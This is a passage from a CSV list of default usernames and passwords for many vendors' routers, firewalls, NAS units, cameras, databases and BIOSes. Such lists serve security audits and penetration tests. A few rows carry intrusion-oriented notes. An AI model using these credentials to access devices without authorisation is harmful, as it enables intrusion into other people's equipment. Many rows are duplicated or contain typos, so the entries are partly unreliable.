graphics,IRIX,,Admin,tour,tour,,,\nsilicon graphics,IRIX,,Admin,tutor,,,,\nsilicon graphics,IRIX,,Admin,tutor,tutor,,,\nsilicon graphics,IRIX,,CLI,guest,,,,\nsilicon graphics,IRIX,,CLI,lp,,,,\nsilicongraphics,IRIX,,Multi,4Dgifts,,Admin,,\nsilicongraphics,IRIX,,Multi,4Dgifts,4Dgifts,Admin,,\nsilicongraphics,IRIX,,Multi,Ezsetup,,Admin,,\nsilicongraphics,IRIX,,Multi,OutOfBox,,Admin,,\nsilicongraphics,IRIX,,Multi,demos,,Admin,,\nsilicongraphics,IRIX,,Multi,field,field,Admin,,\nsilicongraphics,IRIX,,Multi,tour,tour,Admin,,\nsilicongraphics,IRIX,,Multi,tutor,,Admin,,\nsilicongraphics,IRIX,,Multi,tutor,tutor,Admin,,\nsilicongraphics,IRIX,5.x 6.x,Multi,guest,,CLI; UID guest,,\nsilicongraphics,IRIX,5.x 6.x,Multi,lp,,CLI; UID lp,,\nsipura,SPA-3000,,prot:,admin,admin,Administration,,\nsitara,qosworks,,Console,root,,Admin,,\nsite interactive,Auction Weaver Lite,,,admin,pass,,,\nsitecom,All WiFi routers,,Multi,,sitecom,Admin,,\nsitecom,DC-207,,,admin,admin,Admin,,\nsitecom,WL-108,,,admin,password,Admin,,\nsitecom,WL-109,,,admin,password,Admin,,\nsitecom,WL-114v2,,,admin,admin,Admin,,\nsitecom,WL-122,,,,sitecom,Admin,,\nsitecom,WL-607,,http://192.168.0.1,admin,admin,,,\nsitecom,WR-1133,,,,damin,Admin,,\nsitecom,wl-108,,192.168.0.1,,,,,\nsitecorecorporation,Sitecore CMS,,,Audrey,a,,,\nsitecorecorporation,Sitecore CMS,,,Bill,b,,,\nsitecorecorporation,Sitecore CMS,,,Denny,d,,,\nsitecorecorporation,Sitecore CMS,,,Lonnie,l,,,\nsitecorecorporation,Sitecore CMS,,,Minnie,m,,,\nsitecorecorporation,Sitecore CMS,,,admin,b,,,\nsiteinteractive,Auction Weaver Lite,,,admin,pass,Admin,,\nsky,SR101,3.45.1133.R,192.168.0.1,admin,sky,Access to sky broadband router settings,,\nsmaamerica,Sunny Webbox,,,,sma,,,\nsmartbridges,airBridge,,admin,admin,public,,,\nsmartbridges,airBridge,2.x,Multi,admin,public,admin,,\nsmartswitch,Router 250 ssr2500,,Admin,admin,,,,\nsmartswitch,Router 250 ssr2500,,v3.0.9,admin,,,,\nsmartswitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin,,\nsmc,2804WR,,HTTP,,smcadmin,Admin,,\nsmc,2804wbr,,,admin,admin,,,\nsmc,7004FW,,Admin,,,,,\nsmc,7004FW,,HTTP,,,Admin,,\nsmc,7004VBR,V.2,http://192.168.2.1.,,smcadmin,Admin,192.168.2.1.,\nsmc,7204BRA,,HTTP,smc,smcadmin,web,,\nsmc,7204BRA,,Multi,smc,smcadmin,Admin,,\nsmc,7204bra,,web,smc,smcadmin,,,\nsmc,7401BRA,1,HTTP,admin,barricade,Admin,,\nsmc,7401BRA,2,HTTP,smc,smcadmin,Admin,,\nsmc,7901W/BRA,,,admin,smcadmin,,,\nsmc,7901W/BRA,,HTTP,admin,smcadmin,,,\nsmc,7901W/BRA,,Multi,admin,smcadmin,,,\nsmc,8014,Comcast,,cusadmin,highspeed,Admin,,\nsmc,8014WG,,192.168.0.1,mso,suddenlink,top admin,for suddenlink router,\nsmc,Barricade 7004 AWBR,,,admin,,,,\nsmc,Barricade 7004 AWBR,,Admin,admin,,,,\nsmc,Barricade 7004ABR,,,,0,Admin,,\nsmc,Barricade 7004ABR,,,,0000,Admin,,\nsmc,Barricade 7004AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP),\nsmc,Barricade 7004VBR,V.2,,,smcadmin,Admin,,\nsmc,Barricade 7004VWBR,,Multi,,,Admin,Connect to 192.168.2.1 or 192.168.2.1:88,\nsmc,Barricade 7204BRB,,HTTP,admin,smcadmin,Admin,,\nsmc,Barricade Router,,,Admin,Barricade,,,\nsmc,Barricade Router,,7004ABR,,0000,,,\nsmc,Barricade Routers,,,Admin,Barricade,Admin,,\nsmc,Comcast Business Gateway,,,cusadmin,highspeed,,,\nsmc,Many models,,,admin,smcadmin,,,\nsmc,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG,\nsmc,Modem/Wireless Router,,http://192.168.0.1,cusadmin,password,root,,\nsmc,Router,,Admin,admin,admin,,,\nsmc,Router,,All,admin,admin,,,\nsmc,Router,All,HTTP,admin,admin,Admin,,\nsmc,Router/Modem,BR7401,Multi,admin,barricade,Admin,,\nsmc,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin,,\nsmc,SMC broadband router,,HTTP,admin,admin,Admin,,\nsmc,SMC2304 Router,,,,smcadmin,,,\nsmc,SMC2304WBR-AG,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC2404 Router,,,,smcadmin,,,\nsmc,SMC2552W-G,,192.168.2.2,admin,smcadmin,,,\nsmc,SMC2652W,,,,WLAN_AP,,,\nsmc,SMC2652W,,,default,WLAN_AP,Admin,,\nsmc,SMC2655W,,192.168.0.254,,MiniAP,,,\nsmc,SMC2755W,,192.168.1.20,Admin,5up,,,\nsmc,SMC2804 Router,,,,smcadmin,,,\nsmc,SMC2804WBR,,HTTP,admin,smcadmin,Admin,,\nsmc,SMC2804WBR,v.1,HTTP,,smcadmin,Admin,,\nsmc,SMC2804WBRP-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC2804WBRP-G,BARRICADE g,192.168.2.1,,,house hold names,,\nsmc,SMC2804WR,,,,smcadmin,,,\nsmc,SMC2870W,,192.168.2.25,admin,smcadmin,,,\nsmc,SMC2890W-AN,,192.168.1.10,admin,,,,\nsmc,SMC7004AWBR,,,admin,,,,\nsmc,SMC7004VBR,,http://192.168.2.1,,,Administration,,\nsmc,SMC7204BRA,,,smc,smcadmin,,,\nsmc,SMC7204BRB,,,admin,smcadmin,,,\nsmc,SMC7401BRA,,,admin,barricade,,,\nsmc,SMC7901BRA,,http://192.168.2.1,,smcadmin,Admin,,\nsmc,SMC7901BRA2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7901BRA2,,http://192.168.2.1,admin,smcadmin,Admin,,\nsmc,SMC7901BRA5,1,http://192.168.2.1,admin,,,,\nsmc,SMC7904BRA,,Multi,,smcadmin,Admin,,\nsmc,SMC7904BRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC7904WBRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC7904WBRA-N,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7904WBRA2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMC7904WBRAS-N2,,192.168.2.1,admin,smcadmin,,,\nsmc,SMC7908VoWBRA,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC8014,1B,http://192.168.0.1,cusadmin,password,user,Brighthouse CFL,\nsmc,SMC8014W-G,2A,http://192.168.0.1,cusadmin,password,Admin,This is a Cable Modem / Wireless Router.,\nsmc,SMC8014WG,,192.168.0.1,cusadmin,password,,,\nsmc,SMC8014WN,unkown,http://192.168.0.1,cusadmin,password,unkown,Suddenlink supplied modem Multi SSID with WPA configurations available,\nsmc,SMCBR14UP,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR14VPN,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR18VPN,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCBR24Q,,http://192.168.2.1,smcadmin,smcadmin,Administration,,\nsmc,SMCD3G-CCR,,http://10.1.10.1,cusadmin,highspeed,admin,Comcast small business modem,\nsmc,SMCD3GN,,192.168.0.1,,,,,\nsmc,SMCD3GNV,,192.168.1.10,cusadmin,highspeed,,,\nsmc,SMCWBR-14N,,http://192.168.2.1,admin,smcadmin,,,\nsmc,SMCWBR11-G,,192.168.2.1,root,smcadmin,,,\nsmc,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong,\nsmc,SMCWBR14-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWBR14-GM,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWBR14-N2,,http:192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMCWBR14S-N2,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,SMCWBR14T-G,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMCWEBS-N,,192.168.2.10,admin,smcadmin,,,\nsmc,SMCWEBT-G,,http://192.168.2.25,,smcadmin,Administration,,\nsmc,SMCWGBR14-N,,http://192.168.2.1,Admin,smcadmin,Admin,,\nsmc,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G,\nsmc,Wireless Router 2655W,,Initial Password,None Needed,MiniAP,,,\nsmc,Wireless Router 2655W,1.4h.9,HTTP,None Needed,MiniAP,Initial Password,,\nsmc,all models,all versions,cable,,highspeed,user,,\nsmc,dc-227v2 001,e.g.1.0,rev.a,http://192.168.0.1,admin,admin,benvenuto,\nsmc,smcwbr14-3gn,,192.168.2.1.,admin,smcadmin,,,\nsmc,wbr14-3gn,,192.168.2.1.,admin,123465,,,\nsmc,wifi,1,,administrator,smcadmin,admin,a,\nsmith & bentzen,InstantWebMail (IWM),,,username,password,,,\nsmithbentzen,Instant Web Mail (IWM),,http,username,password,,,\nsnap,Snap Appliance,,,admin,admin,,,\nsnapgear,Firewall,,Multi,root,admin,tcp-ip,,\nsnapgear,Lite+,,,,default,Admin,,\nsnapgear,Pro Lite and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req.,\nsnapgear,Pro, Lite, and SOHO,1.79 +,Multi,root,default,Admin,Before 1.79 no user name req.,\nsnapgear,SG300,,192.168.0.1,root,default,Admin,,\nsnapgear,SG550,,192.168.0.1,root,password,Admin,,\nsnapgear,SG560,,192.168.0.1,root,default,Admin,,\nsnapgear,SG565,,192.168.0.1,root,default,Admin,,\nsnapgear,SG570,,192.168.0.1,root,default,Admin,,\nsnapgear,SnapGear,,,root,default,,,\nsnapgear,SnapGear,,Multi,root,default,,,\nsnapgear,firewall,,Multi,root,admin,tcp-ip,,\nsnapgear,firewall,,tcp-ip,root,admin,,,\nsnom,320,,http,Administrator,0,,,\nsnom,320,,http,Administrator,0000,,,\nsnom,360,,http,Administrator,0,,,\nsnom,360,,http,Administrator,0000,,,\nsoftwareag,webMethods,,,Administrator,manage,,,\nsoftwarehouse,CCURE Access Control System,(all),Console,manager,manager,Admin,,\nsoftwarehouse,CCURE Access Control System,,Admin,manager,manager,,,\nsoho,nbg800,,,admin,1234,,,\nsoho,nbg800,,,admin,1234,,unknown,\nsolarwinds,Serv-U,,,LocalAdministrator,#l@$ak#.lk;0@P,,,\nsolarwinds,Web Help Desk,,,whd,whd,,,\nsolution6,Viztopia Accounts,,Multi,aaa,often blank,Admin,,\nsonicwall,ALL,,ALL,admin,password,,,\nsonicwall,ALL,,Admin,admin,password,,,\nsonicwall,Any Firewall Device,,,admin,password,,,\nsonicwall,Firewall,,,admin,password,,,\nsonicwall,Firewall,,HTTP,admin,password,root,,\nsonicwall,Firewall,,root,admin,password,,,\nsonicwall,Most UTM Devices (TZ/PRO/NSA),,http://192.168.168.168:80/,admin,password,,,\nsonicwall,SOHO TELE TZ and PRO,,,admin,password,,,\nsonicwall,TZ 190,,Https://10.10.10.206,admin,,,,\nsonicwall,TZ1000,1.03,,admin,depp,,,\nsonicwall,TZ170,,192.168.168.168,admin,password,Admin,,\nsonicwall,TZ190,,https://10.10.10.206,admin,,,,\nsonicx,SonicAnime,on,Telnet,root,admin,Admin,,\nsonicx,SonicAnime,on,Telnet,root,admin,Admin,1.0101E+14,\nsony,Network Camera SNC-RZ30,,,admin,admin,,,\nsony,Network Camera SNC-RZ30,,HTTP,admin,admin,,,\nsony,SNC-RZ30 Network Camera,,,admin,admin,,,\nsonyericsson,T290i,,,,0,default to reset the phone,,\nsonyericsson,T290i,,,,0000,default to reset the phone,,\nsonyericsson,T68i,,,,0,default to reset the phone,,\nsonyericsson,T68i,,,,0000,default to reset the phone,,\nsonyericsson,md300,all versios,console,,,user,,\nsonyericsson,sony ericsson xperia,x1,,apex,ccg425,,,\nsophiaschweizag,Protector,,HTTPS,admin,Protector,Admin,,\nsophiaschweizag,Protector,,SSH,root,root,Admin,,\nsorenson,SR-200,,HTTP,,admin,Admin,,\nsourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nsourcebycircuitcity,In-Store Demo Windows Screen Savers,,,,lt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nsourcefire,RNA Sensor,,,admin,password,,,\nsourcefire,RNA Sensor,,,root,password,,,\nsourcefire,RNA Sensor,,http,admin,password,Admin,,\nsourcefire,RNA Sensor,,ssh/console,root,password,Admin,,\nsovereign hill,InQuery,,,Admin,shs,,,\nsovereignhill,InQuery,,,Admin,shs,Admin,,\nsoyo,PC BIOS,,console,,SY_MB,Admin,,\nspeco,CCTV Digital Video Recorder,all,web interface,admin,1234,admin operator,,\nspeco,CCTV Digital Video Recorder,all,web interface,user,4321,viewing user,,\nspeedstream,5660,,Telnet,,adminttd,Admin,,\nspeedstream,5667,R4.0.1 ,HTTP,,admin,Admin,,\nspeedstream,5667,R4.0.1,HTTP,,admin,Admin,,\nspeedstream,5861 SMT Router,,,admin,admin,,,\nspeedstream,5861 SMT Router,,Admin,admin,admin,,,\nspeedstream,5861 SMT Router,,Multi,admin,admin,Admin,,\nspeedstream,5871 IDSL Router,,,admin,admin,,,\nspeedstream,5871 IDSL Router,,Admin,admin,admin,,,\nspeedstream,5871 IDSL Router,,Multi,admin,admin,Admin,,\nspeedstream,DSL,,,admin,admin,,,\nspeedstream,DSL,,Admin,admin,admin,,,\nspeedstream,DSL,,Multi,admin,admin,Admin,,\nspeedstream,Router 250 ssr250,,,admin,admin,,,\nspeedstream,Router 250 ssr250,,Admin,admin,admin,,,\nspeedstream,Router 250 ssr250,,Multi,admin,admin,Admin,,\nspeedxess,HASE-120,,,,speedxess,,,\nspeedxess,HASE-120,,Admin,,speedxess,,,\nspeedxess,HASE-120,,Multi,,speedxess,Admin,,\nsphairon,AR860,,HTTP,admin,xad$l#12,,,\nspider systems,M250,,,,hello,,,\nspidersystems,M250,,,,hello,,,\nspike,CPE,,,enable,,,,\nspike,CPE,,Admin,enable,,,,\nspike,CPE,,Console,enable,,Admin,,\nsplunk,Splunk,,,admin,changeme,,,\nsprint,PCS,,Other,self,system,remote voicemail,,\nsprint,pcs,,remote voicemail,self,system,,,\nssangyoung,SR2501,,,,2501,,,\nstanozier,TaskFreak,,,admin,,,,\nstratitec,TimeIPS,,root,root,ahetzip8,,,\nstratitec,TimeIPS,All,Console,root,ahetzip8,root,,\nsun,,,,root,,,SunOS 4.1.4,\nsun,Cobalt,,HTTP,admin,admin,Admin,,\nsun,E10000 System Service Processor,,multi,ssp,ssp,Admin,,\nsun,JavaServer,,,admin,admin,,,\nsun,JavaWebServer,,1.x 2.x,admin,admin,,,\nsun,JavaWebServer,,Admin,admin,admin,,,\nsun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin,,\nsun,Sun E10000 System Service Processor,,,ssp,ssp,,,\nsun,SunOS,,,root,t00lk1t,,,\nsun,SunOS,,,root,t00lk1t,Admin,,\nsun,SunOS,,,root,t00lk1t,Admin,default root password set by the Solaris Security Toolkit (JASS) v0.3 toolkit upon execution of the default hardening scripts.,\nsun,SunScreen,,3.1 Lite,admin,admin,,,\nsun,SunScreen,3.1 Lite,http (with java) port 3852,admin,admin,Admin,,\nsun,many,,,root,sun123,,,\nsun,many,,Other,root,sun123,,,\nsunmicrosystems,ILOM of X4100,1,HTTP,root,changeme,Admin,,\nsupermicro,PC BIOS,,,,ksdjfg934t,,,\nsupermicro,PC BIOS,,Admin,,ksdjfg934t,,,\nsupermicro,PC BIOS,,Console,,ksdjfg934t,Admin,,\nsupermicrocomputer,IPMI,,,ADMIN,ADMIN,,,\nsurecom,EP3501/3506,,,admin,surecom,,own os,\nsurecom,Unknown,,,admin,surecom,,,\nsurecom,Wireless Broadband Router 11Mbps,,,admin,admin,Administrator,,\nsuse gmbh,Emailserver,,1.x,root,root,,,\nsuse gmbh,Emailserver,,Admin,root,root,,,\nsusegmbh,Emailserver,1.x,Telnet,root,root,Admin,,\nsweex,,,,sweex,mysweex,,,\nsweex,Broadband Router,,Admin,,blank,,,\nsweex,Broadband Router,LB000020,HTTP,,blank,Admin,,\nsweex,LW055,,192.168.55.1,sweex,mysweex,admin,,\nsweex,LWO50v2,nr 924330268,192.168.50.1,,,admin,,\nsweex,MO200,,http://192.168.200.1,sweex,mysweex,,,\nsweex,lw050v2,2,192.168.50.1,sweex,mysweex,admin,admin,pasword hack\nsweex,lw050v2,2.0,192.168.50.1,sweex,mysweex,delta,,\nswissvoice,IP 10S,,Telnet,target,password,Admin,,\nsybase (datev),Adaptive Server Enterprise,,12,sa,sasasa,,,\nsybase (datev),Adaptive Server Enterprise,,Admin,sa,sasasa,,,\nsybase,Adaptive Server Enterprise,,,12.x,,,,\nsybase,Adaptive Server Enterprise,,11.x 12.x,sa,,,,\nsybase,Adaptive Server Enterprise,,SA and SSO roles,sa,,,,\nsybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles,,\nsybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation,\nsybase,Sybase,,8,DBA,SQL,,,\nsybase,Sybase,,Admin,DBA,SQL,,,\nsybase,Sybase,8,Multi,DBA,SQL,Admin,,\nsybase,Sybase,8.0,Multi,DBA,SQL,Admin,,\nsybasedatev,Adaptive Server Enterprise,12,Multi,sa,sasasa,Admin,,\nsybasedatev,Adaptive Server Enterprise,12.0,Multi,sa,sasasa,Admin,,\nsymantec,BrightMail,,Gateway,admin,symantec,admin,,\nsymantec,Brightmail Anti-Spam,,,root,brightmail,,,\nsymantec,Brightmail Anti-Spam,,,root,brightmail,,the MySQL account's password,\nsymantec,NAV CORP / ALL,,,admin,symantec,,,\nsymantec,NAV CORP / ALL,,Admin,admin,symantec,,,\nsymantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin,,\nsymantec,Norton Antivirus Corp Ed.,,Admin,,symantec,,,\nsymantec,Norton Antivirus Corp Ed.,,all,,symantec,,,\nsymantec,Norton Antivirus Corp Ed.,all,Multi,,symantec,Admin,,\nsymantec,Norton Antivurs,,,,symantec,,,\nsymantec,VPN-Firewall,,,admin,,,,\nsymantec,VPN/Firewall Appliance,100/200,http,admin,,Admin,,\nsymbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint,\nsymbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint,\nsymbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint,\nsymbol,AP-5131,,Multi,admin,motorola,https,,\nsymbol,Spectrum 24 Access Point,,,Symbol,Symbol,,,\nsymbol,Spectrum 24 Access Point,,HTTP,Symbol,Symbol,,,\nsymbol,Spectrum 24 Access Point,,http,symbol,Symbol,Admin,,\nsymbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless,\nsymbol,ap5131,,,admin,symbol,,,\nsynology,CS-406,All,Web Management UI,admin,,Admin,,\nsynology,CS-406e,All,Web Management UI,admin,,Admin,,\nsynology,CS407,All,Web Management UI,admin,,Admin,,\nsynology,CS407e,All,Web Management UI,admin,,Admin,,\nsynology,DS-101,All,Web Management UI,admin,,Admin,,\nsynology,DS-101g+,All,Web Management UI,admin,,Admin,,\nsynology,DS-101j,All,Web Management UI,admin,,Admin,,\nsynology,DS-106,All,Web Management UI,admin,,Admin,,\nsynology,DS-106e,All,Web Management UI,admin,,Admin,,\nsynology,DS-106j,All,Web Management UI,admin,,Admin,,\nsynology,DS1010+,All,Web Management UI,admin,,Admin,,\nsynology,DS107+,All,Web Management UI,admin,,Admin,,\nsynology,DS107,All,Web Management UI,admin,,Admin,,\nsynology,DS107e,All,Web Management UI,admin,,Admin,,\nsynology,DS108j,All,Web Management UI,admin,,Admin,,\nsynology,DS109+,All,Web Management UI,admin,,Admin,,\nsynology,DS109,All,Web Management UI,admin,,Admin,,\nsynology,DS109j,All,Web Management UI,admin,,Admin,,\nsynology,DS110+,All,Web Management UI,admin,,Admin,,\nsynology,DS110j,All,Web Management UI,admin,,Admin,,\nsynology,DS111,All,Web Management UI,admin,,Admin,,\nsynology,DS112+,All,Web Management UI,admin,,Admin,,\nsynology,DS112,All,Web Management UI,admin,,Admin,,\nsynology,DS112j,All,Web Management UI,admin,,Admin,,\nsynology,DS1511+,All,Web Management UI,admin,,Admin,,\nsynology,DS1512+,All,Web Management UI,admin,,Admin,,\nsynology,DS1812+,All,Web Management UI,admin,,Admin,,\nsynology,DS207+,All,Web Management UI,admin,,Admin,,\nsynology,DS207,All,Web Management UI,admin,,Admin,,\nsynology,DS209+,All,Web Management UI,admin,,Admin,,\nsynology,DS209+II,All,Web Management UI,admin,,Admin,,\nsynology,DS209,All,Web Management UI,admin,,Admin,,\nsynology,DS209j,All,Web Management UI,admin,,Admin,,\nsynology,DS210+,All,Web Management UI,admin,,Admin,,\nsynology,DS210j,All,Web Management UI,admin,,Admin,,\nsynology,DS211+,All,Web Management UI,admin,,Admin,,\nsynology,DS211,All,Web Management UI,admin,,Admin,,\nsynology,DS211j,All,Web Management UI,admin,,Admin,,\nsynology,DS212+,All,Web Management UI,admin,,Admin,,\nsynology,DS212,All,Web Management UI,admin,,Admin,,\nsynology,DS212j,All,Web Management UI,admin,,Admin,,\nsynology,DS2411+,All,Web Management UI,admin,,Admin,,\nsynology,DS3611xs,All,Web Management UI,admin,,Admin,,\nsynology,DS3612xs,All,Web Management UI,admin,,Admin,,\nsynology,DS408,All,Web Management UI,admin,,Admin,,\nsynology,DS409+,All,Web Management UI,admin,,Admin,,\nsynology,DS409,All,Web Management UI,admin,,Admin,,\nsynology,DS409slim,All,Web Management UI,admin,,Admin,,\nsynology,DS410,All,Web Management UI,admin,,Admin,,\nsynology,DS410j,All,Web Management UI,admin,,Admin,,\nsynology,DS411+,All,Web Management UI,admin,,Admin,,\nsynology,DS411+II,All,Web Management UI,admin,,Admin,,\nsynology,DS411,All,Web Management UI,admin,,Admin,,\nsynology,DS411j,All,Web Management UI,admin,,Admin,,\nsynology,DS411slim,All,Web Management UI,admin,,Admin,,\nsynology,DS412+,All,Web Management UI,admin,,Admin,,\nsynology,DS508,All,Web Management UI,admin,,Admin,,\nsynology,DS509+,All,Web Management UI,admin,,Admin,,\nsynology,DS710+,All,Web Management UI,admin,,Admin,,\nsynology,DS712+,All,Web Management UI,admin,,Admin,,\nsynology,RS-406,All,Web Management UI,admin,,Admin,,\nsynology,RS212,All,Web Management UI,admin,,Admin,,\nsynology,RS2211+,All,Web Management UI,admin,,Admin,,\nsynology,RS2211RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS2212+,All,Web Management UI,admin,,Admin,,\nsynology,RS2212RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS3411xs,All,Web Management UI,admin,,Admin,,\nsynology,RS3412RPxs,All,Web Management UI,admin,,Admin,,\nsynology,RS3412xs,All,Web Management UI,admin,,Admin,,\nsynology,RS407,All,Web Management UI,admin,,Admin,,\nsynology,RS408,All,Web Management UI,admin,,Admin,,\nsynology,RS408-RP,All,Web Management UI,admin,,Admin,,\nsynology,RS409+,All,Web Management UI,admin,,Admin,,\nsynology,RS409,All,Web Management UI,admin,,Admin,,\nsynology,RS409RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS411,All,Web Management UI,admin,,Admin,,\nsynology,RS810+,All,Web Management UI,admin,,Admin,,\nsynology,RS810RP+,All,Web Management UI,admin,,Admin,,\nsynology,RS812+,All,Web Management UI,admin,,Admin,,\nsynology,RS812,All,Web Management UI,admin,,Admin,,\nsynology,RS812RP+,All,Web Management UI,admin,,Admin,,\nsynology,USB Station,All,Web Management UI,admin,,Admin,,\nsynologyinc,DSM Server,,,admin,,,,\nsyskonnect,6616,,,default.password,,,,\nsystem32,VOS,,Multi,install,secret,Admin,,\ntandberg,Border Controller,,Telnet/ssh/http,admin,TANDBERG,Admin,,\ntandberg,Codec,,,admin,,,,\ntandberg,DLT8000 Autoloader 10x,,Console,,10023,Maintenance,,\ntandberg,Gatekeeper,,,admin,TANDBERG,Admin,,\ntandberg,TANDBERG,,8000,,TANDBERG,,,\ntandberg,Tandberg,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf,\ntandberg,Video Communication Server,,,root,TANDBERG,,,\ntandem,TACL,,Multi,super.super,,Admin,,\ntandem,TACL,,Multi,super.super,master,Admin,,\ntasman,T1,1000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,4000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,6000 Series,console,Tasman,Tasmannet,Admin,,\ntasman,T1,7000 Series,console,Tasman,Tasmannet,Admin,,\ntcomfort,Routers,,HTTP,Administrator,,Admin,,\nteamxodus,XeniumOS,2.3,FTP,xbox,xbox,Admin,,\ntecom,Titan,,admin,TECOM MASTER,4346,,,\ntecom,Titan,2.06,Other,TECOM MASTER,4346,admin,,\ntegile,Zebi Array,,,admin,tegile,,,\ntekelec,Eagle STP,,,eagle,eagle,,,\nteklogix,Accesspoint,,Multi,Administrator,,Admin,,\ntelappliant,IP2006 SIP Phone,,http,admin,1234,Admin,,\ntelcel,Telcel,all versions,numers,root,1111,root,,\ntelcosystems,Edge Link 100,,Console,telco,telco,telco,,\ntelebit,Netblazer,,,setup,setup,,,\ntelebit,Netblazer,,,snmp,nopasswd,,,\ntelebit,netblazer 3.*,,,setup,setup,,,\ntelebit,netblazer 3.*,,,snmp,nopasswd,,,\ntelecomnz,Nokia M10,,,Telecom,Telecom,,,\nteledat,Routers,,HTTP,admin,1234,Admin,,\ntelelec,Eagle,,,eagle,eagle,,,\nteletronics,WL-CPE-Router,3.05.2,HTTPS,admin,1234,Admin,,\ntelewall,TW-EA510,,,admin,admin,,,\ntelewell,TW-EA200,,Multi,admin,password,Admin,,\ntelewell,TW-EA510,,http://192.168.0.254,admin,admin,Admin,,\ntelindus,1124,,HTTP,,,Admin,,\ntelindus,SHDSL1421,yes,HTTP,admin,admin,Admin,,\ntelindus,telindus,2002,Telnet,admin,admin,Admin,,\ntellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083,\ntellabs,Titan 5500,,Admin,tellabs,tellabs#1,,,\ntellabs,Titan 5500,,FP 6.x,tellabs,tellabs#1,,,\ntellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin,,\nteltronic s.a.u.,NEBULA,,,admin,tetra,,,\ntelus,Telephony Services,,,(created),telus00,,,\ntelus,Telephony and internet services,,,(username),telus00,User,Initial password if issued in 2000,\ntelus,Telephony and internet services,,,(username),telus01,User,Initial password if issued in 2001,\ntelus,Telephony and internet services,,,(username),telus02,User,Initial password if issued in 2002,\ntelus,Telephony and internet services,,,(username),telus03,User,Initial password if issued in 2003,\ntelus,Telephony and internet services,,,(username),telus04,User,Initial password if issued in 2004,\ntelus,Telephony and internet services,,,(username),telus05,User,Initial password if issued in 2005,\ntelus,Telephony and internet services,,,(username),telus06,User,Initial password if issued in 2006,\ntelus,Telephony and internet services,,,(username),telus07,User,Initial password if issued in 2007,\ntelus,Telephony and internet services,,,(username),telus08,User,Initial password if issued in 2008,\ntelus,Telephony and internet services,,,(username),telus09,User,Initial password if issued in 2009,\ntelus,Telephony and internet services,,,(username),telus10,User,Initial password if issued in 2010,\ntelus,Telephony and internet services,,,(username),telus11,User,Initial password if issued in 2011,\ntelus,Telephony and internet services,,,(username),telus12,User,Initial password if issued in 2012,\ntelus,Telephony and internet services,,,(username),telus13,User,Initial password if issued in 2013,\ntelus,Telephony and internet services,,,(username),telus99,User,Initial password if issued in 1999,\ntenda,W150M,,192.168.1.1,admin,admin,Admin,,\nterayon,,,,admin,nms,,6.29,\nterayon,,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html,\nterayon,TeraLink 1000 Controller,,,admin,password,,,\nterayon,TeraLink 1000 Controller,,,user,password,,,\nterayon,TeraLink Getaway,,,admin,password,,,\nterayon,TeraLink Getaway,,,user,password,,,\nterayon,TeraLink,,,admin,password,,,\nterayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html,\ntexbox,TexBox,,,no user,123,,,\ntextportal,TextPortal,,,god1,12345,,,\ntextportal,TextPortal,,,god2,12345,,,\nthecus,Tech N5200,,,admin,admin,,,\nthomson,,,,D8AA0,12345678,,,\nthomson,585,7,192.168.254,,,admin,,\nthomson,782i,,http://192.168.1.254,Administrator,CPE.hgw.12,Administrator,Made in Macedonia! BaDxBoY,\nthomson,95124f,WBR-2310,,,,,root,\nthomson,DCW725 Wireless Cable Gateway,,,,admin,Admin,,\nthomson,DWG855,,,blank,admin,Admin,,\nthomson,ST2030,All,10.1.24.88,administrator,784518,Admin,,\nthomson,SpeedTouch ,,125.24.231.95,admin,suadmin,,,\nthomson,SpeedTouch 516,Most,192.168.1.254 or http://speedtouch.lan,Administrator,,Admin,,\nthomson,SpeedTouch 530,,http://10.0.0.138,,,Administration,,\nthomson,SpeedTouch 